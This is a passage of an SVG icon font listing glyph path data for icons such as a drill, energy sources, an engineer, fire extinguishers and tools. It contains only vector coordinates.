47c1-14 3-28 11-42 5 17 0 39-11 42z m10-61c0-7 2-11 6-16 1 6-1 11-6 16z m546 227c-3 5-8 9-14 11-5 2-9 4-13 7-11 5-16 15-13 27l3 18c2 9-1 16-8 21-10 7-21 6-31 2-16-8-28-21-37-36-9-12-17-25-28-37-13-14-32-22-49-31-8-4-14-8-12-19 1-4 0-10 0-14-1-12-5-23-8-36 22 11 42 21 62 31 20 11 41 15 63 14 14-1 28-1 42 0 18 1 34 5 42 23 7 12 1 19 1 19z" />
<glyph glyph-name="drill" horiz-adv-x="1000" unicode="&#xe991;" d="M304 689c61 0 122-1 182 0 12 0 21-3 28-13 3-5 3-11 3-16 0-61 0-122 0-183 0-18-10-28-29-28-43-1-85-1-128 0-6 0-9-2-10-8-7-25-3-51-3-76-1-26 0-51 0-76 0-12-7-18-19-19-9 0-22 5-28-1-6-6-7-18-9-28-5-14-9-29-13-44-2-5 0-6 4-6 8 1 15 1 23 0 14 0 25-11 26-26 0-42 0-85-1-128 0-14-11-25-26-25-43-1-86-1-129-1-28 0-55 0-83 1-18 0-29 11-29 29l0 119c0 20 8 29 27 31 4 1 5 3 6 6 17 57 33 114 50 170 7 25 14 49 22 74 2 6 1 8-6 8-14-1-28 0-43-1-18 0-30 12-30 30 0 60 0 121 0 181 0 19 11 29 31 29 61 1 123 1 184 1z m5-110c52 1 104 1 156 0 7 0 9 2 8 9 0 9 0 18 0 27 1 7-2 9-9 9-48-1-97-1-146-1-55 0-110 0-166 1-7 0-9-3-8-10 0-8 0-17 0-26-1-7 1-9 9-9 52 1 104 0 156 0z m399-54c-20 0-39-1-57 0-9 0-12-3-10-11 0-2 0-4 0-6-1-14-10-24-24-24-18-1-36 0-53 0-15 0-24 9-24 24 0 43 0 85 0 128 0 14 8 23 22 24 18 1 37 1 55 0 15 0 23-10 24-25 0-3 0-6 0-9 0-13 0-13 13-15 3-1 4-2 5-4 16-27 32-54 49-82z m-272-163c0-13 0-26 0-39 0-11-5-17-16-17-11 0-22 0-33 0-10 0-16 5-16 15 0 28 0 56 0 84 0 11 6 16 17 16 11 0 21 0 32 0 10 0 16-6 16-16 0-15 0-29 0-43z m400 163h-76c-3 0-5 0-7 3-15 27-31 54-47 83h40c6 0 13-1 20 0 14 2 23-3 30-16 12-24 26-46 40-70z m-3 86c27 0 52 0 77 0 4 0 5-2 7-5 6-11 12-22 19-32 2-4 2-6 0-10-7-11-14-23-21-34-2-4-4-6-8-5-1 0-1 0-2 0-17-3-27 3-35 19-10 23-24 44-37 67z" />
<glyph glyph-name="eco-energy" horiz-adv-x="1000" unicode="&#xe992;" d="M868 367c-1 8-3 16-6 25-34 109-104 187-209 235 9-19 13-39 32-52 68-43 115-103 142-179 47-134 0-292-113-379-61-47-130-73-207-73-47 0-79 26-66 83 5 20 13 39 21 58 4 7 9 12 15 16 134 92 194 222 188 382-3 85-30 162-86 227-29 34-79 64-122 76-5 3 0 1-2-6-1-6-3-13-5-19-11-35-29-66-48-97-80-135-110-279-72-434 13-53 29-105 49-159 82 128 143 258 125 414 6-29 12-58 12-87-1-104-32-200-78-292-15-30-28-61-31-95-3-48 23-84 69-95 25-6 51-4 76-1 125 16 234 97 288 209 23 49 31 113 32 125 6 55 1 95-4 118z m-646-256c-11-1-14 1-18 9-17 30-29 61-36 95-31 139 31 288 154 361 23 14 28 32 36 56-95-43-161-109-200-199 0-1-63-115-12-260 8-25 19-48 32-71 4-8 3-13-2-20-22-29-22-65-2-95 4-6 8-10 14-4 12 12 19 6 25-6 2-4 5-8 7-12 4-9 9-11 19-5 13 7 16 14 5 26-2 2-3 6-6 9-9 11-7 17 5 24 11 7 19 9 25-5 1-4 4-7 6-11 5-10 10-15 23-6 11 7 13 13 4 23-1 2-2 5-4 7-12 13-11 23 6 30 10 3 10 8 4 17-20 31-49 44-85 37z m36-46c-21-14-43-27-66-42-4 42 30 69 64 55 3-1 8-2 9-6 0-4-5-5-7-7z" />
<glyph glyph-name="eco-environmen" horiz-adv-x="1000" unicode="&#xe993;" d="M769 325c-3 7-8 14-15 19-9 6-19 13-29 19l-109 73c-20 13-41 27-62 41-2 2-5 4-9 2-2-1-3 0-4 3-1 10-6 18-15 25-2 2-2 3 1 5 3 2 3 5 3 9-1 9-1 19-2 29l-4 65c-2 25-3 50-5 75-1 23-3 45-4 68-1 9-4 18-9 25-4 5-8 6-11 1-5-7-9-15-9-23-3-30-5-60-6-91-2-29-4-58-6-87l-4-54c0-3 0-7 0-10-1-5 4-6 5-10-1-1-2-2-4-4-6-6-10-13-13-21 0-1 0-2 0-3-1-2-1-3-3-2-5 2-9-2-13-4-41-28-83-56-125-84-23-15-47-31-70-47-7-5-13-12-16-20-3-5-1-9 6-9 8-1 16 0 24 4 34 16 67 33 101 50 38 18 75 37 112 55 4 2 8 4 8 8h1c0-16-1-33-2-49-1-29-3-57-4-85-2-30-3-61-5-91-1-23-2-45-3-68l-3-60-3-59c-1-19-2-38-2-56-1-4-2-5-5-6-6-2-11-3-17-4l-52-14c-5-2-5-2-5-7 0-5 0-10 0-16 0-4 1-5 5-5 6 0 11 0 16 0l57 0 55 0h72c9 0 17 0 26 0 3 0 4 1 4 4 0 6 0 12 0 18 0 4-1 5-4 5-13 4-26 7-39 11-10 3-20 5-31 8-3 1-4 2-4 5 0 5 0 9-1 13l-4 87c-1 25-3 49-4 74l-4 89-5 95c-1 24-2 48-3 73-1 11-1 23-2 34 0 2-1 4 2 6 0-7 4-8 8-10 1-1 2-1 3-1l104-52s69-34 104-51c8-5 17-6 26-5 7 0 9 4 6 10z m-259 128c-7-3-13-3-20 0-1 0-2 1-2 3 2 3 2 7 4 11 6-4 11-4 16 0 3-3 3-7 4-11 0-1 0-3-2-3z m10 19c-3-1-6-2-10-2 0 4 0 9-4 11-2 2-4 3-6 3-6 0-9-4-10-14-4 0-7 2-11 3-2 0-3 2-2 4 1 7 4 13 11 17 1 1 3 1 4 0l1-1c2-2 4-6 7-6 3 0 5 3 7 6 2 1 4 2 6 0 5-4 9-9 10-16 0-2 0-4-3-5z m222-301c2 38-36 64-71 50-4-2-4-2-7 2-11 18-30 27-52 23-30-5-47-35-40-64 2-5 2-5-3-8-27-21-27-62 1-82 3-2 4-4 4-8 4-33 34-51 62-45 3 1 6 2 9 2 1-1 1-3 1-4-1-13-2-26-2-40l-3-42c0-12-1-25-1-38 0-4 0-4 4-4 6-1 11 0 17-1 6 0 6 1 6 6-1 16-2 32-3 48l-3 64c0 6 0 6 6 5 6-2 12-2 19 0 21 5 34 18 39 38 1 4 3 6 6 8 28 15 35 52 15 76-3 5-5 9-4 14z m-383-175c15-3 34 5 40 25 1 4 3 5 6 7 17 11 22 35 9 51-3 3-4 6-3 11 0 25-23 42-47 34-5-2-5-2-7 2-10 13-27 18-42 12-15-6-24-22-21-38 1-5 0-8-4-11-16-14-15-40 2-53 3-2 4-4 5-8 2-20 20-32 40-29 2 0 4 2 8 1 0-2 0-4 0-5l-3-54c0-8 0-17-1-25 0-2 1-3 4-3 3 0 7 0 10 0 4-1 4 1 4 4 0 10-1 19-1 29-1 15-2 31-3 47 0 2 1 4 4 3z" />
<glyph glyph-name="energy-air" horiz-adv-x="1000" unicode="&#xe994;" d="M923 35c-36 21-72 42-108 63-56 32-111 65-167 97-7 3-10 7-11 14-1 12-7 22-16 30-13 11-13 14-2 27 13 15 29 26 45 37 12 8 17 17 12 31-2 9-4 18-6 27-19 73-38 146-57 218-5 16-13 23-27 21-12-2-19-12-20-27 0-2 0-4 0-6v-153c0-52 0-104 0-156 0-8-1-15-8-20-9-7-14-17-16-28-2-15-5-16-19-14-21 3-39 12-58 21-13 6-24 5-34-6-42-41-84-81-126-122-18-18-37-37-55-56-11-11-12-23-4-32 8-10 20-11 33-4 2 1 3 2 5 3 89 51 178 103 268 155 7 4 13 6 21 2 12-5 24-5 36 1 12 7 16-1 20-10 6-16 8-34 9-51 3-30 3-31 32-39 43-12 87-24 131-37 34-9 68-18 102-27 1-1 2-1 3-1 14-3 25 2 30 13 4 11 0 22-13 29z m-657 411c-36-18-75-26-114-32-29-4-58-6-89-5 2-2 2-3 3-3 68-13 136-19 204-7 47 8 87 29 111 72 22 37 25 77 20 119-11 77-92 138-172 112-56-19-105-58-88-135 9-40 41-83 100-80 44 3 73 35 68 79-3 28-29 49-55 42 5-2 11-5 15-8 19-12 24-35 12-52-14-18-44-24-59-10-15 13-21 30-16 51 6 25 27 43 51 45 27 1 58-18 66-43 21-61 4-116-57-145z m60-246c13 74-26 133-98 148-21 5-42 7-63 7-35 0-69-2-103-10 5-1 10-1 15-1 49-2 96-10 140-30 47-22 66-67 48-115-7-20-29-36-49-36-17 0-36 15-43 34-6 15 0 35 13 44 10 6 20 6 30 1 10-5 16-12 17-24 2-18-7-29-27-36 25-4 47 14 48 40 1 35-28 60-66 58-53-4-80-62-69-108 10-39 62-72 106-68 53 5 91 41 101 96z m51 131c13-11 35-13 49-5 13 8 18 18 15 36-1-3-2-5-3-7-3-12-11-17-23-16-13 0-22 7-25 19-4 12 1 21 11 28 21 15 56 0 60-26 4-25-10-50-34-58-39-13-76-8-110 20 14-31 37-51 67-58 40-11 84 5 107 37 23 33 22 69-2 104-27 37-70 44-106 15-29-22-32-66-6-89z m207-205l-12 2c-5 1-9 1-13-2-11-6-22-13-36-20 26-16 52-24 80-20 4 1 7 1 7 6 0 11 0 23-5 32-3 6-14 1-21 2z m67 131c-3-2-5-3-2-7 12-20 21-42 46-51 9-3 13-5 12 5-1 18-5 33-12 47-14 29-22 30-44 6z m-165-2c-7-11-5-17 7-21 8-2 15-8 22-7 7 1 7 12 11 18 4 6 13 10 13 19v42c-25-12-41-30-53-51z" />
<glyph glyph-name="energy-oil" horiz-adv-x="1000" unicode="&#xe995;" d="M891 598c-64 0-128 0-192 0-7 0-11-3-15-8l-242-246c-3-3-8-5-7-12h14c33 0 66 0 99 0 5 0 12 1 15-5 2-6-5-8-8-11-37-35-73-69-110-103l-72-68 2-3h13c27 0 54 0 81-1 5 0 11 2 14-3 3-6-3-9-6-12-50-59-99-117-148-175l-29-35 3-3c127 102 254 204 381 307-6 5-10 3-15 3-21 0-43 0-65 0-4 0-10-1-11 4-2 5 3 7 6 10l58 54 77 71c17 15 33 30 50 45l-2 3c-19 0-39 0-58 0-5 1-13-3-16 4-2 7 6 10 10 14 57 53 114 105 171 158 3 3 7 5 8 11-3 0-4 1-6 1z m-433 30c-52-1-104 0-156-1-52 0-104 0-157 1-8 0-11-2-11-12 0-39 0-78 0-117 0-10 2-13 12-13 104 1 208 1 313 0 8 0 12 3 11 12 0 39 0 78 0 117 1 10-2 13-12 13z m-42-257c-4 1-6 1-7 1-88 0-176 0-264 0-10 0-11-3-11-12 0-39 0-77 0-116 0-10 3-13 13-13 85 0 170 0 255 0 4 0 8-1 11 2 19 17 37 34 55 51 4 4 3 9 2 13-2 5-6 3-10 3-14 0-28 0-42 0-12 1-22 8-27 20-5 12-2 23 7 32 5 6 11 12 18 19z m-282 284c56 2 112 1 168 1h170c22 0 29 7 29 29 0 22-7 29-29 29h-195c-49 0-98 0-147 0-12 1-22-3-25-15-6-24-1-44 29-44z m0-255h254c19 0 39-5 55 2 16 7 28 25 41 38 3 4 11 7 9 13-3 5-10 5-16 6-3 0-6 0-9 0h-335c-22 0-30-8-30-29 0-22 8-30 31-30z m528 223c0 28-1 56 0 84 0 10-4 12-13 12-39 0-77 0-116 0-8 0-10-1-8-10 8-29 7-56-22-75-7-4-4-12-4-17 1-7 7-4 11-4 23-1 46-1 69-1 24 0 48 1 72 0 8 0 11 3 11 11z m-338-474c18 17 36 34 54 51-2 1-2 2-3 2-83 0-166 0-250 0-15 0-22-10-22-28 1-20 7-29 24-29l184 0c5 0 10 0 13 4z m72 598c45 0 91 0 136 0 44 0 89 0 134 0 15 0 20 5 20 20 0 15-5 21-20 21-90 0-180 0-270 0-16 0-20-5-20-21 0-16 4-20 20-20z m194-200c11 12 24 23 38 37-36 0-68 0-100 0-29 0-29-1-29-30 0-8 2-11 10-11 23 1 46 1 69 0 5 0 8 1 12 4z m-91-56c0-2 0-4 0-5 3-18 15-14 20-11l45 41h-41c-25 0-25 0-24-25z" />
<glyph glyph-name="energy-savings" horiz-adv-x="1000" unicode="&#xe996;" d="M688 524c-4 20-21 28-47 23-79-17-159-34-239-51-22-5-45-9-67-14-18-5-27-19-24-36 3-17 15-26 32-25 9 0 14-3 16-11 2-8 9-17-4-24-4-2-7-7-6-12 0-10-3-13-13-14-12 0-19-9-19-21-5-69 5-133 59-183 18-16 33-36 39-60 3-11 10-14 21-14 41 0 83 0 124 0 11 0 17 3 20 14 6 20 16 37 31 50 59 52 74 118 68 192 0 9-3 19-12 20-14 2-15 13-22 21-18 21-7 36 4 52 3 5 5 8 7 12 18 27 23 53 23 53 8 7 12 17 9 28z m-230-163c-9 0-15 1-15 12 0 4-1 11-6 12-16 6-14 21-19 33-5 14-1 17 12 20 58 12 115 24 177 37-18-26-31-48-32-75-1-6-4-8-9-10-9-3-14-9-13-18 1-10-4-11-12-11-28 0-56 0-83 0z m187-44c2-8 1-16 1-24 1-50-14-93-52-128-13-12-23-27-29-44-4-11-23-18-33-12-6 2-2 6-2 9 5 15 13 29 25 39 49 42 63 97 59 160 0 5-10 17 6 18 13 1 23-3 25-18z m4 324c-75-16-150-32-225-47-29-6-58-12-87-19-19-4-28-17-26-35 2-16 13-26 31-27 2 0 6 0 10 1 104 22 207 43 311 66 19 4 29 19 25 37-4 18-20 28-39 24z m-313 26c-19-4-27-18-25-35 2-16 14-26 33-27 3 1 9 1 14 2 70 15 140 30 210 45 33 7 65 13 98 21 18 5 26 21 22 38-5 17-18 25-37 23-5-1-10-2-15-3-69-14-138-29-208-44-30-6-61-12-92-20z m152-681c2 0 4 0 5 0 27 4 53 8 79 11 6 1 12 3 12 9 0 8-7 10-14 9-4 0-8-1-13-1-25-3-50-6-75-9-4-1-12-2-12 4 0 7 6 6 11 7 29 4 58 7 87 11 7 1 16 2 16 11-1 12-11 8-18 7-27-2-55-6-83-9-5 0-13-3-14 4-1 8 8 6 13 8 6 1 12 1 18 2 7 1 15 0 14 10 0 10-8 7-13 8-11 0-21 0-32 0-10 0-20 0-30 0-15-1-32-29-24-43 7-14 1-31 2-46 2-17 2-46 17-49 21-3 40-15 59-17 24-3 46 16 71 19 8 1 14 11 13 22 0 4 1 7 2 11 7 18 6 19-13 18-26-3-52-6-77-8-7-1-18-7-19 3-1 8 11 6 18 8z m-140 712c44 9 92 18 140 29 15 4 23 21 20 36-4 16-18 26-35 25-12-2-24-5-36-7-33-7-66-13-99-20-20-5-29-18-27-36 2-17 16-28 37-27z" />
<glyph glyph-name="energy-solar" horiz-adv-x="1000" unicode="&#xe997;" d="M311 401z m185 52c-1 1-1 2-2 4-12 41-40 71-76 93-61 37-144 27-197-20-68-61-71-160-29-219 25-36 56-60 97-72 0 0 1 0 2 0v167c0 25 21 47 47 47l158 0z m-356-20c14 90 88 160 183 166 81 4 162-43 194-126 2-6 3-14 5-20h37c-8 7-16 15-24 22-6 5-8 11-8 18 1 30 0 61 1 91 0 10-4 13-14 13-30-1-60 0-90-1-7 0-12 2-17 8-22 22-45 44-67 66-5 6-8 6-13 0l-65-66c-6-6-12-8-20-8-30 1-61 0-91 1-9 0-12-3-11-12l0-91c0-8-3-14-8-19-22-21-43-43-64-64-6-6-8-9-1-16 22-21 43-43 65-65 6-5 8-10 8-18l0-93c0-8 2-10 10-10l90 0c9 0 16-1 22-8 9-11 19-21 28-31v42c-101 24-166 119-150 221z m751-5h-531c-25 0-47-21-47-47v-308c0-25 22-47 47-47h531c25 0 47 22 47 47v308c0 26-22 47-47 47z m-54-81c0 20 1 21 27 21 17-1 18-3 18-29 0-17-2-19-24-19-21 1-21 1-21 27z m45-65c0-18-2-20-23-20-21 0-22 1-22 24 0 23 0 23 27 23 18 0 18-1 18-27z m-131 86c21 0 22-2 22-24 0-23-1-24-24-24-21 0-22 2-22 25 0 21 2 23 24 23z m22-82c0-22-1-24-22-24-23 0-24 1-24 24 0 22 1 23 22 23 23 0 24-1 24-23z m-21-34c19 0 21-2 21-24 0-22-1-24-24-24-21 0-22 2-22 26 0 20 2 22 25 22z m-180 116c20 0 21-2 22-25 0-19-1-24-25-23-20 1-21 1-21 25 0 22 1 23 24 23z m-94-22c0 20 2 22 25 22 19 0 21-3 21-24 0-23-1-24-22-24-24 0-24 0-24 26z m0-53c0 15 3 16 26 16 19 0 20-1 20-24 0-19-3-23-17-23-29 0-29 0-29 31z m-26 75c14-1 17-4 17-18v-7c0-8 3-18-6-21-11-4-23-3-34 0-3 1-5 5-5 9 0 3 0 6 0 9 0 28 0 28 28 28z m17-84c0-21-1-22-25-22-18 0-20 2-20 25 0 21 1 22 21 22 24 0 24 0 24-25z m-100 63c0 20 1 21 29 21 15 0 17-3 16-23 0-25 0-25-26-25-18 0-19 1-19 27z m45-61c0-23-1-24-21-24-23 0-24 1-24 24 0 23 0 23 24 23 16 0 23 0 21-23z m-45-57c1 23 0 23 25 23 20 0 20-1 20-25 0-22 0-22-23-23-19 0-23 2-22 25z m45-62c0-19 0-20-23-20-22 0-22 0-22 24 0 23 1 23 26 23 19 0 19-1 19-27z m-33-78c-16 1-11 14-12 24 1 7-3 18 6 21 11 4 23 3 34 0 3-1 5-4 5-8l0-9c2-34-6-29-33-28z m88 23c0-21-1-23-20-23-24 0-25 1-25 21 0 26 0 25 24 26 16 0 23-1 21-24z m-45 57c0 24 1 25 22 25 22 0 23-1 23-24 0-22-1-23-20-23-25 0-25 0-25 22z m45 56c0-20-1-20-23-21-19 0-23 3-22 24-1 21 1 24 23 24 20 0 23-2 22-27z m36-136c-26 0-27 1-27 21 0 25 1 26 19 26 27 0 27 0 27-24 0-21-2-23-19-23z m-27 79c0 25 1 26 22 26 23 0 24-1 24-23 0-24 0-24-24-24-21 0-22 1-22 21z m46 59c-1-23 0-23-27-23-17 0-19 2-19 25-1 18 1 23 26 23 16-1 21-2 20-25z m44-138c-18 0-20 1-20 24 0 22 1 23 22 23 23 0 23 0 23-26 0-21-1-21-25-21z m-20 86c0 18 3 20 30 19 13 0 16-4 15-24 0-23 0-23-27-23-18 0-18 1-18 28z m23 29c-20 0-23 3-23 23 0 24 1 25 27 24 17 0 18-1 18-23 0-22-1-24-22-24z m-3 58c-18 1-20 2-20 24 0 23 0 23 23 23 22 0 22 0 23-25 0-17-1-23-26-22z m60 106c19-1 20-2 20-23 0-25 0-25-26-25-18 0-19 2-19 24-2 19 2 25 25 24z m-5-106c-18 0-20 2-20 24 0 22 0 23 23 23 22 0 22-1 22-24 0-22-1-23-25-23z m25-34c0-22-1-24-19-24-25 0-26 1-26 21 0 26 0 27 20 27 25 0 25-1 25-24z m-20-139c-23-1-26 4-26 22 1 25 1 25 25 25 20 0 21-1 21-24 0-22-1-23-20-23z m13 59c-11-2-23-3-34 2-3 1-5 5-4 9 0 7 0 15 0 22 0 3 0 6 3 8 10 10 22 5 34 4 9-1 8-11 8-18v-6c0-8 2-18-7-21z m42-59c-24 0-26 1-26 21 0 25 1 26 23 26 22 0 23-1 23-24 0-22-1-23-20-23z m0 58c-24 0-26 1-26 19 0 27 1 28 21 28 24 0 25 0 25-24 0-22-1-23-20-23z m-5 57c-20 0-21 2-21 27 0 20 1 20 28 20 17 0 18-2 18-23 0-23-1-24-25-24z m-21 84c0 21 1 21 27 21 18 0 19-2 19-23 0-23-1-24-25-24-19 0-21 2-21 26z m24 32c-23 0-23 1-24 24-1 20 4 25 24 24 21-1 22-2 22-24 0-23-1-24-22-24z m72-126c18 0 20-3 20-23 0-24 0-24-26-24-20 0-20 1-20 27 0 19 2 20 26 20z m-9-105c-15 0-17 3-17 23 0 22 1 24 21 24 23 0 25-2 25-18 0-29 0-29-29-29z m37 257c1 20 2 22 26 22 19 0 21-2 21-27 0-19-2-21-24-21-18-1-24 2-23 26z m0-171c0 17 3 19 28 19 17 0 19-3 19-24 0-23 0-23-30-23-15 0-17 3-17 28z m0 53c0 21 2 23 21 23 25 0 26 0 26-22 0-23-2-25-22-25-23 0-25 1-25 24z m23-139c-21 0-23 1-23 23 0 23 1 24 25 24 20 0 22-2 22-23 0-23-2-24-24-24z m-1 173c-20 1-22 2-22 27 0 18 2 20 24 20 22 0 23-1 23-23 1-21-4-25-25-24z m53-173c-18 0-19 2-19 24 0 23 0 23 26 23 18 0 19-2 19-24 0-23 0-23-26-23z m26 78c0-18-1-20-20-20-25 0-25 0-25 24 0 22 1 23 20 23 22 1 26-2 25-27z m-29 37c-14 0-16 4-16 25 0 21 1 22 18 23 24 0 27-3 28-18 0-29-1-30-30-30z" />
<glyph glyph-name="energy-water" horiz-adv-x="1000" unicode="&#xe998;" d="M937 608c-1 4-6 2-9 2-64 0-128 0-192 0-6 0-10-2-14-6-66-67-132-134-197-201-3-2-7-4-6-8 2-4 7-2 10-2l106 0c6 0 13 2 16-4 2-7-5-9-9-13-58-54-116-109-174-163-3-3-6-6-8-8-4-4-3-6 2-7 5 0 9 0 14 0h83c4 0 8 1 10-3 2-4-1-7-3-10-2-2-3-3-4-5-52-60-103-120-154-181-9-10-18-20-26-31l3-3c130 104 260 209 390 314-6 4-11 3-15 3-22 0-44 0-66 0-4 0-10-2-12 3-3 6 3 9 7 12 58 54 116 108 175 161 4 4 9 7 13 15h-65c-4 0-11-1-13 4-2 6 4 9 8 12l124 111c3 2 8 4 6 8z m-874-45c0-6 2-9 8-8 12 1 25 2 37 4 52 8 100 27 139 63 5 4 7 4 12 0 44-40 97-60 155-65 80-7 152 12 213 64 5 4 7 5 12 1 9-8 19-14 28-22 5-4 9-4 14 1 12 13 24 24 36 36 5 5 6 7-1 11-6 4-12 8-18 13-25 21-47 45-64 74-90-142-284-158-381 0-12-33-34-56-62-73-36-23-74-38-117-40-8-1-12-3-11-12 1-16 0-32 0-47z m15-183c63 4 120 23 167 65 7 5 10 5 16 0 50-44 109-63 174-65 10 0 16 3 23 10 13 15 28 29 42 44 7 8 14 15 23 24-131-27-211 3-270 102-10-23-24-42-43-57-40-33-86-53-138-57-7-1-10-3-9-11 0-13 1-27 0-41-1-13 4-15 15-14z m319-164c15 16 31 31 46 46 2 2 6 3 5 7-85 3-154 34-195 115-7-18-15-33-28-45-43-41-94-62-152-68-7-1-11-2-10-11 0-15 0-30 0-45-1-8 2-10 10-10 65 2 123 22 172 65 7 6 10 4 15-1 35-30 75-48 120-58 7-2 12 0 17 5z" />
<glyph glyph-name="engineer" horiz-adv-x="1000" unicode="&#xe999;" d="M363 403c6-12 13-23 22-33 38-44 87-66 146-53 61 14 97 56 119 111 2 7 2 15 10 19 44 28 41 73 42 116 0 6-3 10-8 9-14-1-13 7-14 17-6 61-31 113-81 150-12 9-26 14-31 30-1 5-6 9-14 10-3-34-6-67-9-101-1-11-2-22-17-21-14 1-11 13-11 23 1 30 1 60 3 90 2 24-15 16-26 17-17 3-13-8-13-18 1-32 2-63 3-95 0-6 0-13-8-16-5-2-11-1-15 3-4 5-5 11-5 16-3 30-5 59-8 88 0 5 2 12-4 14-6 1-9-6-12-10-5-6-5-15-13-19-60-35-90-89-98-157-2-10 2-23-17-21-3 0-5-4-5-8-2-36-3-74 24-100 19-19 28-40 40-61z m188 158c7 50 13 99 20 154 47-37 72-80 73-137 0-7-4-9-10-11-24-8-48-11-73-14-7-1-11 0-10 8z m-194 26c5 48 24 88 62 119 5 4 11 11 13-3 5-45 11-90 17-134 2-14-2-19-16-16-20 4-41 6-61 12-12 3-18 9-15 22z m-13-77c3 11 17 6 25 3 76-33 154-25 233-12 8 1 16 4 23 9 2 2 5 4 8 4 9 1 21 6 26-6 5-9-6-23-19-24-16-2-18-15-21-26-7-22-16-43-31-62-24-29-52-42-96-45-30 3-59 20-82 48-13 18-23 38-28 60-4 14-9 23-25 25-13 2-17 16-13 26z m-20-375c1 0 4 2 4 3 2 12 2 25 0 37 0 9-8 5-13 6-7 1-6 7-6 11 0 15 0 31 0 47 0 17 0 33 0 50 0 6-1 9-9 6-34-16-70-30-78-74-2-9-7-18-10-27-34-87-66-176-97-264-5-14-1-17 12-16 23 1 46 1 70 0 11-1 16 3 21 14 26 61 53 122 81 183 5 11 6 27 25 24z m560-205c-30 89-63 177-96 264-4 9-9 18-11 27-7 44-43 59-78 74-7 3-9 0-9-6 0-17 0-33 0-50h0c0-15 0-31 0-47 0-4 2-10-5-11-5-1-13 3-14-6-1-12-2-25 1-37 0-1 2-3 4-3 18 3 20-13 25-24 27-61 54-122 80-183 5-11 11-15 22-14 23 1 46 1 69 0 14-1 17 2 12 16z m-237 28c3 17-4 21-20 21-74-1-149 0-224-1-16 0-36 7-46-2-10-10-2-31-3-47-1-11 2-15 14-15 44 1 88 1 132 1v0c17 0 34 0 51 0 17 0 34-1 51-1 14 1 33-6 42 4 9 8 1 27 3 40z m-260 122c-1 19-18 35-37 35-20-1-37-18-36-37 1-20 18-36 38-36 18 1 35 19 35 38z m264 35c-20 0-36-16-36-36 0-20 16-37 36-37 19 0 36 18 36 37 0 19-17 35-36 36z m-9 158c0 9 0 19-1 28 0 4 1 9-4 12-9 5-31-1-37-10-22-34-45-69-66-103-5-8-11-13-22-12-7 1-14 1-20 0-13-2-20 4-27 15-21 34-43 68-65 102-2 4-5 6-8 8-8 4-18 1-27 0-4 0-6-3-6-6l-5-148c0-3-1-7-1-10 0-1 0-2 0-2l0-2h0c1-8 5-11 15-11 44 1 88 1 132 1 44 0 89 0 133 0 10-1 14 2 14 14 0 2 0 4 0 6h0l-5 118z" />
<glyph glyph-name="fire-extinguisher-alt" horiz-adv-x="1000" unicode="&#xe99a;" d="M832 608c-34 31-69 62-103 94-7 6-14 9-23 9-35 1-70 3-105 4-11 0-15 4-18 14-9 31-36 51-67 52-29 1-58-18-68-46-11-29-5-66 23-80 28-15 27-34 26-58 0-7-1-14 0-21 1-11-4-17-13-22-16-9-32-19-48-27-28-14-40-36-40-68 2-83 1-166 1-249 0-86 0-172 0-258 0-28 11-39 38-39 85 0 170 0 255 0 25 0 38 12 38 38 0 172 0 344 0 516 0 24-10 43-31 55-16 9-32 19-48 27-16 7-22 17-22 35 2 42 1 41 42 50 21 4 39 1 57-10 28-16 56-31 84-46 11-6 22-11 30 1 9 12 2 21-8 29z m-317 71c-16 0-31 15-31 31 0 15 14 29 29 29 18 1 31-12 31-29 1-17-12-31-29-31z m158-683c0-12-8-19-20-18-10 0-17 8-18 19 0 8 0 17 0 26h0c0 9-1 17 0 25 1 12 7 19 19 19 12 0 19-7 19-18 1-17 1-35 0-53z m-38 466c0 5 0 11 1 16 2 10 9 15 19 15 9 0 15-5 18-14 1-6 1-12 1-18 0-54 0-109 0-163v-164c0-6 0-12-1-18-2-10-9-15-19-15-10 0-17 6-18 16-1 5-1 10-1 16 0 109 0 219 0 329z m-226 246v16c0 24 0 24-24 24-13 0-23 0-29 14-3 8-11 8-18 9-56 5-111 11-167 16-11 2-15-2-15-13 0-42 0-84 0-126 0-10 3-15 15-14 55 6 111 12 166 17 9 1 18 3 22 12 3 8 9 10 17 10 33 1 33 1 33 35z" />
<glyph glyph-name="fire-extinguisher" horiz-adv-x="1000" unicode="&#xe99b;" d="M458 627c-74 0-134-61-134-136v-494h268v494c0 75-60 136-134 136z m285-375l-10 198c0 16-11 31-26 36-2 118-83 220-195 246v21h-14v26c0 5-4 9-9 9h-96c-5 0-12-3-15-7l-129-131c-4-5 7-23 26-44l100 102c17 18 43 10 43-20v-42h80v41h14v22c100-25 172-118 173-223-15-5-26-20-26-36l-10-198-9-171c0-1 1-2 1-3 1-1 2-1 3-1h104c1 0 3 0 3 1 1 1 1 2 1 3l-9 171z m-419-267h268v-73h-268v73z" />
<glyph glyph-name="fix-tools" horiz-adv-x="1000" unicode="&#xe99c;" d="M245 149c0 39 0 79 0 119 1 44 19 78 57 100 7 4 10 8 10 17 0 29 0 59 0 88 0 9-1 14-11 13-8 0-13 6-18 11-24 23-47 47-71 70-7 7-11 14-11 24 1 34 1 68 1 102 0 10 3 17 10 24 22 20 43 40 65 60 7 7 15 13 26 8 11-4 12-14 12-24 0-36 0-71 0-106-1-13 3-17 16-17 18 1 37 1 55 0 12-1 16 5 15 16 0 35 0 71 0 106 0 10 0 20 11 25 11 5 19-1 26-8 22-20 43-40 65-60 8-7 12-16 11-28 0-31 0-64 1-95 0-12-4-20-12-28-24-23-46-46-70-69-3-3-7-8-10-8-25-1-20-19-20-33-1-23 0-45-1-67 0-10 4-16 13-22 41-24 57-62 56-109 0-9-4-12-13-12-24 1-48 0-72 0-13 0-25-2-25-18-1-15 11-18 24-18 24 0 48-1 72 0 16 1 13-10 14-19 1-10-2-16-14-16-23 1-47 1-70 1-13 0-26-2-26-19 0-16 12-18 25-18 23 0 47 0 70 1 15 0 15-8 15-19 0-11-1-17-14-16-24 1-47 0-71 0-12 0-25-2-25-18-1-17 12-18 25-18 24 0 47 0 71 0 6 0 12 0 14-9 12-61-23-123-79-142-70-23-145 29-147 103-1 43 0 85 0 128z m326 1c0 37 0 74 0 112 0 46 17 83 59 107 7 4 10 9 10 17-1 48-1 96 0 143 0 11-4 16-14 20-38 18-37 18-29 59 10 50 19 100 28 150 5 27 8 29 34 29 19 0 38 0 57 1 15 0 23-7 26-21 11-61 23-121 35-181 3-15-4-25-17-29-26-8-32-26-30-52 2-39 0-78 0-117 0-10 3-15 11-20 42-25 58-63 57-111-1-11-6-11-14-11-24 1-48 0-73 0-12 0-23-2-23-17-1-15 10-19 23-19 24 0 47-1 71 0 16 1 15-8 16-19 0-12-3-16-16-15-22 1-44 0-66 0-14 0-29-1-28-19 0-18 15-18 29-18 22 0 44-1 66 1 16 1 14-9 14-19 1-11-1-17-14-16-24 1-47 0-71 0-12 